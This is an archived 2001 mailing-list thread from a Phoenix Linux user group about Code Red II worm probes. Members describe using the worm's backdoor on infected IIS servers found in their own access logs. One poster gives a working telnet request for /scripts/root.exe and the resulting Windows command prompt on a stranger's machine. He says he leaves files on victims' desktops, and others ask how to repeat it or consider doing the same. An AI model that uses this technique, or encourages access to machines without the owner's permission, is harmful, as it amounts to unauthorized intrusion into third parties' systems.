CR worm infection attempts

Top Page
This message is part of the following thread:
Mthe complete thread tree sorted by date
M----\Gary Nichols at <-
M+++\MKim Allen at ->
Attachments:
Message as email
+ (text/plain)
Delete this message
Reply to this message
Author: plug-discuss@lists.PLUG.phoenix.az.us
Date:  
Subject: CR worm infection attempts
I have contemplated doing the same, but I fear for the idiot who comes
back with a lawsuit saying "YOU EVIL PERSON! YOU EXPLOITED MY
MACHINE!" When all I was doing was informing them of their problem.


On Sun, Aug 05, 2001 at 09:20:44PM -0700, Gary Nichols wrote:
> To answer your question... make sure you're hitting enter TWICE after
> the command.
>
> As a security guy myself, I'm deeply troubled by what I'm finding.
> Check it out:
>
> [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xxx.xxx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Mon, 06 Aug 2001 04:22:13 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
>
> c:\inetpub\scripts>
>
> >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> that explains how I did it, and why they need to pay attention to
> security patches. :)
>
> Hopefully they won't take it the 'wrong' way.
>
> ~g~
>
> On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > Wayne Conrad wrote:
> > >
> > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > I got tired of counting and just started putting the info into my IDS page.
> > > > That way I can send complaints and point them to a URL so I don't have to
> > > > keep recreating the same data each time.
> > > 
> > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > >     Wayne
> > ________________________________________________

> >
> > I've been trying that out
> >
> > telnet ipaddress_from_my_httpd_access_log 80
> >
> > GET /scripts/root.exe HTTP/1.0
> >
> > but I can't get a command prompt - what am I missing?
> >
> > Craig
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list -
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >
>
>
> ________________________________________________
> See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
>
> PLUG-discuss mailing list -
> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss

--

This message was posted to the following mailing lists:
Plug Discuss
Mailing List Info | Nearby Messages		<-CR worm infection attemptsMethodology or Philosophy of Troubleshooting->
Some Mailing List Archive administrated by UnconfiguredLurker (version 2.3)